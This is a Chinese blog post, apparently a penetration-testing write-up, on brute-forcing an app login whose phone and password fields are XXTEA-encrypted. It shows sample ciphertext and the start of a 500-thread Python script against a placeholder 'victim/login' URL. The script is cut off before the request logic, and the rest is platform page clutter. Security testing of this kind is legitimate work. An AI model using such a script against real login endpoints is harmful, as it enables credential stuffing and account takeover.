对加密的应用进行暴力破解

    测试某APP需要进行暴力破解,以验证网站是否易受撞库、暴破等安全威胁。虽然网站没有采用SSL安全链路传输,但用户名和密码这两个关键字段进行了加密。密文如下:

phone=0MX9YvaTzdcAm9dZSmx7Dg==&passwd=krz2gix+C2S9j8dIX++R6A==

    首先使用base64解码,结果是乱码。参数在传输前进行了加密,加密方法可以通过逆向APP进行分析。使用xxtea进行加密。

xxtea是tea(Tiny Encryption Algorithm,TEA)微型加密算法的二次升级版。在获得加密算法之后,通过对app逆向分析,也发现了秘钥。通过python脚本发送http请求模拟暴力破解,来观察攻击面:

    代码如下:  

import xxtea
import base64
import requests
import threading
import time

uri = "http://victim/login"
threadLimit = 500
requestIndex = 0

def encode(text):
    key = "******-****-****-8CA6-*******"
    return base64.b64encode(xxtea.encrypt(text, key))

def postRequest(phone, passwd):
   
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值